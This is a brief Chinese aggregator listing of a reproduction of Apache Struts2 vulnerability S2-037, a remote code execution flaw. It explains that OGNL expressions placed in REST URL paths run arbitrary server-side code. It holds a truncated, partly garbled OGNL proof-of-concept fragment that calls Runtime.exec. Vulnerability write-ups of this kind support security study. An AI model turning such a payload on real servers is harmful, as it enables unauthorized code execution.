0x29. Apache Struts2远程代码执行漏洞(S2-037)复现

时间  2020-12-20
栏目 Apache 繁體版
原文   原文链接
s2-037:使用REST插件启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式;使用http://localhost:8080/1/XXX这种请求方式,XXX可以是任何合法的名字 ,通过将XXX构造为OGNL执行命令; poc: #[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getRuntime().ex
相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程